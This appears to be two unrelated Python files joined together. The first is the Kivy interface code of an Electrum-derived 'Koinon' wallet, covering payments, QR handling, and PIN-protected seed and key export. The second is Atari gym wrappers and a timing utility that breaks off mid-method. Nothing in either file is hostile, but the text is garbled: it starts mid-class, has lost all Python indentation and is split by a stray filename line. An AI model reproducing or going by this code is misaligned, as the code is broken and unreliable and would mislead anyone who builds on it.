App.__init__(self)#, **kwargs)
title = _('Koinon Electrum App')
self.electrum_config = config = kwargs.get('config', None)
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None) # type: Network
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
net_params = self.network.get_parameters()
self.server_host = net_params.host
self.server_port = net_params.port
self.auto_connect = net_params.auto_connect
self.oneserver = net_params.oneserver
self.proxy_config = net_params.proxy if net_params.proxy else {}
self.update_proxy_str(self.proxy_config)
self.plugins = kwargs.get('plugins', [])
self.gui_object = kwargs.get('gui_object', None)
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_change = config.get('use_change', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updating a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
# cached dialogs
self._settings_dialog = None
self._password_dialog = None
self.fee_status = self.electrum_config.get_fee_status()
def on_pr(self, pr):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = self.wallet.invoices.add(pr)
if self.invoices_screen:
self.invoices_screen.update()
status = self.wallet.invoices.get_status(key)
if status == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
else:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum.bitcoin import base_decode, is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('bitcoin:'):
self.set_URI(data)
return
# try to decode transaction
from electrum.transaction import Transaction
from electrum.util import bh2u
try:
text = bh2u(base_decode(data, None, base=43))
tx = Transaction(text)
tx.deserialize()
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
if s is None:
s = self.tabs.ids[name + '_screen']
s.load_screen()
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, addr):
self.switch_to('receive')
self.receive_screen.screen.address = addr
def show_pr_details(self, req, status, is_invoice):
from electrum.util import format_time
requestor = req.get('requestor')
exp = req.get('exp')
memo = req.get('memo')
amount = req.get('amount')
fund = req.get('fund')
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/invoice.kv')
popup.is_invoice = is_invoice
popup.amount = amount
popup.requestor = requestor if is_invoice else req.get('address')
popup.exp = format_time(exp) if exp else ''
popup.description = memo if memo else ''
popup.signature = req.get('signature', '')
popup.status = status
popup.fund = fund if fund else 0
txid = req.get('txid')
popup.tx_hash = txid or ''
popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', []))
popup.export = self.export_private_keys
popup.open()
def show_addr_details(self, req, status):
from electrum.util import format_time
fund = req.get('fund')
isaddr = 'y'
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/invoice.kv')
popup.isaddr = isaddr
popup.is_invoice = False
popup.status = status
popup.requestor = req.get('address')
popup.fund = fund if fund else 0
popup.export = self.export_private_keys
popup.open()
def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None):
from .uix.dialogs.qr_dialog import QRDialog
def on_qr_failure():
popup.dismiss()
msg = _('Failed to display QR code.')
if text_for_clipboard:
msg += '\n' + _('Text copied to clipboard.')
self._clipboard.copy(text_for_clipboard)
Clock.schedule_once(lambda dt: self.show_info(msg))
popup = QRDialog(title, data, show_text, on_qr_failure)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('electrum/gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.clock()))
win = Window
win.bind(size=self.on_size, on_keyboard=self.on_keyboard)
win.bind(on_key_down=self.on_key_down)
#win.softinput_mode = 'below_target'
self.on_size(win, win.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'status', 'new_transaction', 'verified']
self.network.register_callback(self.on_network_event, interests)
self.network.register_callback(self.on_fee, ['fee'])
self.network.register_callback(self.on_fee_histogram, ['fee_histogram'])
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path())
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, wizard, wallet):
if wallet: # wizard returned a wallet
wallet.start_network(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
elif not self.wallet:
# wizard did not return a wallet; and there is no wallet open atm
# try to open last saved wallet (potentially start wizard again)
self.load_wallet_by_name(self.electrum_config.get_wallet_path(), ask_if_wizard=True)
def load_wallet_by_name(self, path, ask_if_wizard=False):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if wallet.has_password():
self.password_dialog(wallet, _('Enter PIN code'), lambda x: self.load_wallet(wallet), self.stop)
else:
self.load_wallet(wallet)
else:
def launch_wizard():
storage = WalletStorage(path, manual_upgrades=True)
wizard = Factory.InstallWizard(self.electrum_config, self.plugins, storage)
wizard.bind(on_wizard_complete=self.on_wizard_complete)
action = wizard.storage.get_action()
wizard.run(action)
if not ask_if_wizard:
launch_wizard()
else:
from .uix.dialogs.question import Question
def handle_answer(b: bool):
if b:
launch_wizard()
else:
try: os.unlink(path)
except FileNotFoundError: pass
self.stop()
d = Question(_('Do you want to launch the wizard again?'), handle_answer)
d.open()
def on_stop(self):
Logger.info('on_stop')
if self.wallet:
self.electrum_config.save_last_wallet(self.wallet)
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.open()
elif name == 'status':
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
else:
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize The Ux part of electrum. This function performs the basic
tasks of setting up the ui.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "icons/electrum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
net_params = self.network.get_parameters()
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_forkpoint = chain.get_max_forkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
else:
self.server_host = str(net_params.host) + ' (connecting...)'
self.proxy_config = net_params.proxy or {}
self.update_proxy_str(self.proxy_config)
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'network_updated':
self._trigger_update_interfaces()
self._trigger_update_status()
elif event == 'wallet_updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'blockchain_updated':
# to update number of confirmations in history
self._trigger_update_wallet()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.wallet_name = wallet.basename()
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def update_status(self, *dt):
if not self.wallet:
return
if self.network is None or not self.network.is_connected():
status = _("Offline")
elif self.network.is_connected():
self.num_blocks = self.network.get_local_height()
server_height = self.network.get_server_height()
server_lag = self.num_blocks - server_height
if not self.wallet.up_to_date or server_height == 0:
status = _("Synchronizing...")
elif server_lag > 1:
status = _("Server lagging")
else:
status = ''
else:
status = _("Disconnected")
if status:
self.balance = status
self.fiat_balance = status
else:
c, u, x = self.wallet.get_balance()
text = self.format_amount(c+x+u)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(c+u+x) + ' [size=22dp]%s[/size]'% self.fx.ccy
def get_max_amount(self):
from electrum.transaction import TxOutput
if run_hook('abort_send', self):
return ''
inputs = self.wallet.get_spendable_coins(None, self.electrum_config)
if not inputs:
return ''
addr = str(self.send_screen.screen.address) or self.wallet.dummy_address()
outputs = [TxOutput(TYPE_ADDRESS, addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.electrum_config)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
except NotEnoughFunds:
return ''
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, 0, self.decimal_point(), is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Koinon', message,
app_icon=icon, app_name='Koinon Electrum Wallet')
except ImportError:
Logger.Error('Notification: needs plyer; `sudo python3 -m pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
now = time.time()
if self.wallet and self.wallet.has_password() and now - self.pause_time > 60:
self.password_dialog(self.wallet, _('Enter PIN'), None, self.stop)
if self.nfcscanner:
self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, touch):
if label.touched:
label.touched = False
self.qr_dialog(label.name, label.data, True)
else:
label.touched = True
self._clipboard.copy(label.data)
Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.')))
def set_send(self, address, amount, label, message):
self.send_payment(address, amount=amount, label=label, message=message)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://electrum/gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon='atlas://electrum/gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://electrum/gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except Exception as e:
ok, msg = False, repr(e)
else:
ok, msg = True, tx.txid()
Clock.schedule_once(lambda dt: on_complete(ok, msg))
def broadcast(self, tx, pr=None):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
if pr:
self.wallet.invoices.set_paid(pr, tx.txid())
self.wallet.invoices.save()
self.update_tab('invoices')
else:
display_msg = _('The server returned an error when broadcasting the transaction.')
if msg:
display_msg += '\n' + msg
display_msg = display_msg[:500]
self.show_error(display_msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def invoices_dialog(self, screen):
from .uix.dialogs.invoices import InvoicesDialog
if len(self.wallet.invoices.sorted_list()) == 0:
self.show_info(' '.join([
_('No saved invoices.'),
_('Signed invoices are saved automatically when you scan them.'),
_('You may also save unsigned requests or contact addresses using the save button.')
]))
return
popup = InvoicesDialog(self, screen, None)
popup.update()
popup.open()
def requests_dialog(self, screen):
from .uix.dialogs.requests import RequestsDialog
if len(self.wallet.get_sorted_requests(self.electrum_config)) == 0:
self.show_info(_('No saved requests.'))
return
popup = RequestsDialog(self, screen, None)
popup.update()
popup.open()
def addresses_dialog(self, screen):
from .uix.dialogs.addresses import AddressesDialog
popup = AddressesDialog(self, screen, None)
popup.update()
popup.open()
def fee_dialog(self, label, dt):
from .uix.dialogs.fee_dialog import FeeDialog
def cb():
self.fee_status = self.electrum_config.get_fee_status()
fee_dialog = FeeDialog(self, self.electrum_config, cb)
fee_dialog.open()
def on_fee(self, event, *arg):
self.fee_status = self.electrum_config.get_fee_status()
def protected(self, msg, f, args):
if self.wallet.has_password():
on_success = lambda pw: f(*(args + (pw,)))
self.password_dialog(self.wallet, msg, on_success, lambda: None)
else:
f(*(args + (None,)))
def delete_wallet(self):
from .uix.dialogs.question import Question
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Enter your PIN code to confirm deletion of {}").format(basename), self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
dirname = os.path.dirname(wallet_path)
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path()
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except:
self.show_error("Invalid PIN")
return
label.text = _('Seed') + ':\n' + seed
if passphrase:
label.text += '\n\n' + _('Passphrase') + ': ' + passphrase
def password_dialog(self, wallet, msg, on_success, on_failure):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(self, wallet, msg, on_success, on_failure)
self._password_dialog.open()
def change_password(self, cb):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
message = _("Changing PIN code.") + '\n' + _("Enter your current PIN:")
def on_success(old_password, new_password):
self.wallet.update_password(old_password, new_password)
self.show_info(_("Your PIN code was updated"))
on_failure = lambda: self.show_error(_("PIN codes do not match"))
self._password_dialog.init(self, self.wallet, message, on_success, on_failure, is_change=1)
self._password_dialog.open()
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password)[0])
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Enter your PIN code in order to decrypt your private key"), show_private_key, (addr, pk_label))
|
impala.py
|
# # https://github.com/facebookresearch/torchbeast/blob/master/torchbeast/core/environment.py
import numpy as np
from collections import deque
import gym
from gym import spaces
import cv2
cv2.ocl.setUseOpenCL(False)
class NoopResetEnv(gym.Wrapper):
def __init__(self, env, noop_max=30):
"""Sample initial states by taking random number of no-ops on reset.
No-op is assumed to be action 0.
"""
gym.Wrapper.__init__(self, env)
self.noop_max = noop_max
self.override_num_noops = None
self.noop_action = 0
assert env.unwrapped.get_action_meanings()[0] == 'NOOP'
def reset(self, **kwargs):
""" Do no-op action for a number of steps in [1, noop_max]."""
self.env.reset(**kwargs)
if self.override_num_noops is not None:
noops = self.override_num_noops
else:
noops = self.unwrapped.np_random.randint(1, self.noop_max + 1) #pylint: disable=E1101
assert noops > 0
obs = None
for _ in range(noops):
obs, _, done, _ = self.env.step(self.noop_action)
if done:
obs = self.env.reset(**kwargs)
return obs
def step(self, ac):
return self.env.step(ac)
class FireResetEnv(gym.Wrapper):
def __init__(self, env):
"""Take action on reset for environments that are fixed until firing."""
gym.Wrapper.__init__(self, env)
assert env.unwrapped.get_action_meanings()[1] == 'FIRE'
assert len(env.unwrapped.get_action_meanings()) >= 3
def reset(self, **kwargs):
self.env.reset(**kwargs)
obs, _, done, _ = self.env.step(1)
if done:
self.env.reset(**kwargs)
obs, _, done, _ = self.env.step(2)
if done:
self.env.reset(**kwargs)
return obs
def step(self, ac):
return self.env.step(ac)
class EpisodicLifeEnv(gym.Wrapper):
def __init__(self, env):
"""Make end-of-life == end-of-episode, but only reset on true game over.
Done by DeepMind for the DQN and co. since it helps value estimation.
"""
gym.Wrapper.__init__(self, env)
self.lives = 0
self.was_real_done = True
def step(self, action):
obs, reward, done, info = self.env.step(action)
self.was_real_done = done
# check current lives, make loss of life terminal,
# then update lives to handle bonus lives
lives = self.env.unwrapped.ale.lives()
if lives < self.lives and lives > 0:
# for Qbert sometimes we stay in lives == 0 condition for a few frames
# so it's important to keep lives > 0, so that we only reset once
# the environment advertises done.
done = True
self.lives = lives
return obs, reward, done, info
def reset(self, **kwargs):
"""Reset only when lives are exhausted.
This way all states are still reachable even though lives are episodic,
and the learner need not know about any of this behind-the-scenes.
"""
if self.was_real_done:
obs = self.env.reset(**kwargs)
else:
# no-op step to advance from terminal/lost life state
obs, _, _, _ = self.env.step(0)
self.lives = self.env.unwrapped.ale.lives()
return obs
class MaxAndSkipEnv(gym.Wrapper):
def __init__(self, env, skip=4):
"""Return only every `skip`-th frame"""
gym.Wrapper.__init__(self, env)
# most recent raw observations (for max pooling across time steps)
self._obs_buffer = np.zeros((2,)+env.observation_space.shape, dtype=np.uint8)
self._skip = skip
def step(self, action):
"""Repeat action, sum reward, and max over last observations."""
total_reward = 0.0
done = None
for i in range(self._skip):
obs, reward, done, info = self.env.step(action)
if i == self._skip - 2: self._obs_buffer[0] = obs
if i == self._skip - 1: self._obs_buffer[1] = obs
total_reward += reward
if done:
break
# Note that the observation on the done=True frame
# doesn't matter
max_frame = self._obs_buffer.max(axis=0)
return max_frame, total_reward, done, info
def reset(self, **kwargs):
return self.env.reset(**kwargs)
class ClipRewardEnv(gym.RewardWrapper):
def __init__(self, env):
gym.RewardWrapper.__init__(self, env)
def reward(self, reward):
"""Bin reward to {+1, 0, -1} by its sign."""
return np.sign(reward)
class WarpFrame(gym.ObservationWrapper):
def __init__(self, env, width=84, height=84, grayscale=True, dict_space_key=None):
"""
Warp frames to 84x84 as done in the Nature paper and later work.
If the environment uses dictionary observations, `dict_space_key` can be specified which indicates which
observation should be warped.
"""
super().__init__(env)
self._width = width
self._height = height
self._grayscale = grayscale
self._key = dict_space_key
if self._grayscale:
num_colors = 1
else:
num_colors = 3
new_space = gym.spaces.Box(
low=0,
high=255,
shape=(self._height, self._width, num_colors),
dtype=np.uint8,
)
if self._key is None:
original_space = self.observation_space
self.observation_space = new_space
else:
original_space = self.observation_space.spaces[self._key]
self.observation_space.spaces[self._key] = new_space
assert original_space.dtype == np.uint8 and len(original_space.shape) == 3
def observation(self, obs):
if self._key is None:
frame = obs
else:
frame = obs[self._key]
if self._grayscale:
frame = cv2.cvtColor(frame, cv2.COLOR_RGB2GRAY)
frame = cv2.resize(
frame, (self._width, self._height), interpolation=cv2.INTER_AREA
)
if self._grayscale:
frame = np.expand_dims(frame, -1)
if self._key is None:
obs = frame
else:
obs = obs.copy()
obs[self._key] = frame
return obs
class FrameStack(gym.Wrapper):
def __init__(self, env, k):
"""Stack k last frames.
Returns lazy array, which is much more memory efficient.
See Also
--------
baselines.common.atari_wrappers.LazyFrames
"""
gym.Wrapper.__init__(self, env)
self.k = k
self.frames = deque([], maxlen=k)
shp = env.observation_space.shape
self.observation_space = spaces.Box(low=0, high=255, shape=(shp[:-1] + (shp[-1] * k,)), dtype=env.observation_space.dtype)
def reset(self):
ob = self.env.reset()
for _ in range(self.k):
self.frames.append(ob)
return self._get_ob()
def step(self, action):
ob, reward, done, info = self.env.step(action)
self.frames.append(ob)
return self._get_ob(), reward, done, info
def _get_ob(self):
assert len(self.frames) == self.k
return LazyFrames(list(self.frames))
class ScaledFloatFrame(gym.ObservationWrapper):
def __init__(self, env):
gym.ObservationWrapper.__init__(self, env)
self.observation_space = gym.spaces.Box(low=0, high=1, shape=env.observation_space.shape, dtype=np.float32)
def observation(self, observation):
# careful! This undoes the memory optimization, use
# with smaller replay buffers only.
return np.array(observation).astype(np.float32) / 255.0
class LazyFrames(object):
def __init__(self, frames):
"""This object ensures that common frames between the observations are only stored once.
It exists purely to optimize memory usage which can be huge for DQN's 1M frames replay
buffers.
This object should only be converted to numpy array before being passed to the model.
You'd not believe how complex the previous solution was."""
self._frames = frames
self._out = None
def _force(self):
if self._out is None:
self._out = np.concatenate(self._frames, axis=-1)
self._frames = None
return self._out
def __array__(self, dtype=None):
out = self._force()
if dtype is not None:
out = out.astype(dtype)
return out
def __len__(self):
return len(self._force())
def __getitem__(self, i):
return self._force()[i]
def count(self):
frames = self._force()
return frames.shape[frames.ndim - 1]
def frame(self, i):
return self._force()[..., i]
def make_atari(env_id, max_episode_steps=None):
env = gym.make(env_id)
assert 'NoFrameskip' in env.spec.id
env = NoopResetEnv(env, noop_max=30)
env = MaxAndSkipEnv(env, skip=4)
assert max_episode_steps is None
return env
def wrap_deepmind(env, episode_life=True, clip_rewards=True, frame_stack=False, scale=False):
"""Configure environment for DeepMind-style Atari.
"""
if episode_life:
env = EpisodicLifeEnv(env)
if 'FIRE' in env.unwrapped.get_action_meanings():
env = FireResetEnv(env)
env = WarpFrame(env)
if scale:
env = ScaledFloatFrame(env)
if clip_rewards:
env = ClipRewardEnv(env)
if frame_stack:
env = FrameStack(env, 4)
return env
class ImageToPyTorch(gym.ObservationWrapper):
"""
Image shape to channels x weight x height
"""
def __init__(self, env):
super(ImageToPyTorch, self).__init__(env)
old_shape = self.observation_space.shape
self.observation_space = gym.spaces.Box(
low=0,
high=255,
shape=(old_shape[-1], old_shape[0], old_shape[1]),
dtype=np.uint8,
)
def observation(self, observation):
return np.transpose(observation, axes=(2, 0, 1))
def wrap_pytorch(env):
return ImageToPyTorch(env)
"""Naive profiling using timeit. (Used in MonoBeast.)"""
import collections
import timeit
class Timings:
"""Not thread-safe."""
def __init__(self):
self._means = collections.defaultdict(int)
self._vars = collections.defaultdict(int)
self._counts = collections.defaultdict(int)
self.reset()
def reset(self):
self.last_time = timeit.default_timer()
def time(self, name):
"""Save an update for event `name`.
Nerd alarm: We could just store a
collections.defaultdict(list)
and compute means and standard deviations at the end. But thanks to the
clever math in Sutton-Barto
(http://www.incompleteideas.net/book/first/ebook/node19.html) and
https://math.stackexchange.com/a/103025/5051 we can update both the
means and the stds online. O(1) FTW!
"""
now = timeit.default_timer()
x = now - self.last_time
self.last_time = now
n = self._counts[name]
mean = self._means[name] + (x - self._means[name]) / (n + 1)
var = (
n * self._vars[name] + n * (self._means[name] - mean) ** 2 + (x - mean) ** 2
) / (n + 1)
